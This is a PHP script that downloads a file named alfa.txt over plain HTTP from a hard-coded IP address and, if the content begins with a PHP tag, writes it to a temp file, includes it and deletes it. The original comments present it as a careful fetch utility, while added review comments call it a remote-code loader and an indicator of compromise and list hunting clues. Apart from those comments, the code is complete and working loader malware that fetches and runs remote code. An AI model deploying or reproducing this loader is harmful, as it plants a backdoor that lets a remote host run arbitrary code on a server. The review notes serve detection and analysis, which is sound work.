<?php
// --- Configuration ---
// NOTE(review): taken as a whole, this script downloads a file from a hard-coded
// remote host and, when the response begins with a PHP open tag, executes it via
// include. That is a remote-code loader. The "validation" steps below do not
// change that, so finding this file on a server should be treated as an
// indicator of compromise rather than as a hardened fetch utility.
// Original author's note: only change the allow-listed host if you really trust the source.
$allowed = ['185.128.227.157']; // host allow-list: a single bare IP address
$url = 'http://185.128.227.157/ALL-SHELL/raw-ker/alfa.txt'; // fetch target; plain HTTP, so the response has no transport integrity or authenticity protection
$timeout = 10;

// --- host validation ---
// NOTE(review): $url is a literal defined above and its host is the same value
// that sits in $allowed, so as written this check always passes. It does not
// constrain anything at runtime.
$host = parse_url($url, PHP_URL_HOST);
if (!in_array($host, $allowed, true)) {
    http_response_code(403);
    exit('Forbidden: host not allowed.');
}

// --- extra path validation (described by the author as optional, minimal security) ---
// Requires the URL path to start with /ALL-SHELL/raw-ker/ (case-insensitive prefix match).
// NOTE(review): like the host check, this only inspects the hard-coded $url.
$path = parse_url($url, PHP_URL_PATH) ?: '';
if (stripos($path, '/ALL-SHELL/raw-ker/') !== 0) {
    http_response_code(400);
    exit('Bad request: unexpected path.');
}

// --- fetch the content via cURL ---
$ch = curl_init($url);

// With http (not https) there is no TLS layer, so nothing about the peer can be verified.
// (Original author's note: HTTPS would be safer.)
$scheme = parse_url($url, PHP_URL_SCHEME) ?: 'http';
$curl_opts = [
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_TIMEOUT => $timeout,
    // NOTE(review): redirects are followed, while the host and path checks above
    // ran only against the initial URL, so the final response may come from a
    // different host or path than the ones that were "validated".
    CURLOPT_FOLLOWLOCATION => true,
    // Fixed User-Agent string; it can serve as a proxy/egress-log indicator for this script.
    CURLOPT_USERAGENT => 'Mozilla/5.0 (compatible; FetchBot/1.0)',
];

// Enable certificate verification for HTTPS; for HTTP the author disables it explicitly.
if (strtolower($scheme) === 'https') {
    $curl_opts[CURLOPT_SSL_VERIFYPEER] = true;
    $curl_opts[CURLOPT_SSL_VERIFYHOST] = 2;
} else {
    // For HTTP there is no TLS verification, which the author acknowledges is less safe.
    // NOTE(review): $scheme comes from the initial URL (http here), so verification
    // stays off even if a followed redirect ends on an https:// location.
    $curl_opts[CURLOPT_SSL_VERIFYPEER] = false;
    $curl_opts[CURLOPT_SSL_VERIFYHOST] = 0;
}

curl_setopt_array($ch, $curl_opts);

// Run the request and capture body, status code, content type and any cURL error text.
$body = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$ctype = curl_getinfo($ch, CURLINFO_CONTENT_TYPE);
$err = curl_error($ch);
curl_close($ch);

// Anything other than a successful transfer with HTTP 200 is reported as 502.
// NOTE(review): the status code and raw cURL error text are echoed to the client unescaped.
if ($body === false || $http_code !== 200) {
    http_response_code(502);
    echo "Bad upstream response. HTTP {$http_code}. cURL error: {$err}";
    exit;
}

// --- strip a UTF-8 BOM and leading whitespace before inspecting the content ---
/**
 * Drop a single leading UTF-8 byte-order mark (EF BB BF) from a string.
 *
 * Only one BOM at the very start is removed; any other input is returned as given.
 */
function ltrim_utf8_bom($str) {
    $bom = "\xEF\xBB\xBF";
    // Compare only the first three bytes against the BOM sequence.
    $startsWithBom = (strncmp($str, $bom, 3) === 0);
    return $startsWithBom ? substr($str, 3) : $str;
}
// Normalised copies used only for the content test below; the file written later uses the raw $body.
$body_clean = ltrim_utf8_bom($body);
$body_trim = ltrim($body_clean);

// --- if the content starts with a PHP open tag, execute it (INCLUDE) ---
if (preg_match('/^\s*<\?php/i', $body_trim)) {
    // Original author's warning: executing remote code is risky; make sure the source is trusted.
    // NOTE(review): this is the core hazard of the script. Whatever the remote server
    // returns (or whatever is substituted on the unauthenticated plain-HTTP path) is
    // executed with the full privileges of the PHP process. No signature, hash or
    // content check is applied beyond "starts with <?php".
    // The body is written to a temporary file and then included.
    $tmpdir = sys_get_temp_dir();
    // File name pattern: remote_<16 hex chars>.php in the system temp directory.
    // This is a usable file-system indicator when hunting for this loader.
    $tmpfile = $tmpdir . DIRECTORY_SEPARATOR . 'remote_' . bin2hex(random_bytes(8)) . '.php';

    if (file_put_contents($tmpfile, $body) === false) {
        http_response_code(500);
        exit('Failed to write temporary file.');
    }

    // Restrict the file to owner read/write (the author calls this optional, "for safety").
    // Errors are suppressed with @.
    // NOTE(review): permissions on the temp file do not limit what the included code can do.
    @chmod($tmpfile, 0600);

    // The original comment claims this is an "include in a limited scope".
    // NOTE(review): the include sits at the top level of the script, so the included
    // code runs in the global scope. try/catch only intercepts thrown errors and is
    // not a sandbox.
    try {
        include $tmpfile;
    } catch (Throwable $e) {
        // Original note: on PHP < 7 use Exception instead of Throwable.
        http_response_code(500);
        echo 'Execution error: ' . htmlspecialchars($e->getMessage(), ENT_QUOTES, 'UTF-8');
    }

    // Delete the temporary file (errors suppressed with @).
    // NOTE(review): because the payload is removed once the include returns, on-disk
    // evidence of what ran may be absent. Outbound-connection and web-server logs
    // are likely the more reliable trace; confirm against the host's logging.
    @unlink($tmpfile);
    exit;
}

// --- if the content is not PHP, display it as HTML-escaped text ---
header('Content-Type: text/html; charset=utf-8');
// NOTE(review): both branches below emit exactly the same escaped output, so the
// Content-Type test currently has no effect on behaviour.
if (stripos((string)$ctype, 'text/plain') !== false || stripos((string)$ctype, 'text/') === 0) {
    echo nl2br(htmlspecialchars($body, ENT_QUOTES, 'UTF-8'));
} else {
    // Fallback: also rendered as escaped plain text.
    echo nl2br(htmlspecialchars($body, ENT_QUOTES, 'UTF-8'));
}
